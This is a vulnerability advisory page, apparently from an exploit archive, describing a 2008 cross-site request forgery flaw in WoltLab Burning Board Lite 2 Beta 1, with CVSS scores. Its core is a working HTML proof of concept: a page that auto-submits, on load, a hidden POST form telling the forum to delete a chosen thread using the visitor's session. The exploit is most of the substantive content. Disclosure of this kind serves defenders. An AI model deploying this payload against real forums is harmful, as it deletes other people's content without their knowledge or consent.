WoltLab Burning Board Lite 2 Beta 1 Thread Delete CSRF Vulnerability

2008.03.13
Credit: nbbn
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-352


CVSS Base Score: 6.8/10
Impact Subscore: 6.4/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

#################################################################### WoltLab Burning Board Lite 2 Beta 1 Thread Delete CSRF Vulnerability Vendor: woltlab.de Version: Lite 2 Beta 1 (Released: March 6 2008) Bug found by NBBN on March 8 2008 #################################################################### ::Example <html><head></head><body onLoad="javascript:document.attack.submit()"> <form action="http://site.tld/wbblite/index.php" method="POST" name="attack"> <input type="hidden" name="action" value="ThreadDelete"> <input type="hidden" name="threadID" value="[ID of the thread]"> <input type="hidden" name="x" value="2"> <input type="hidden" name="y" value="8"> </form> </body> </html> ::Fix No codefix


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top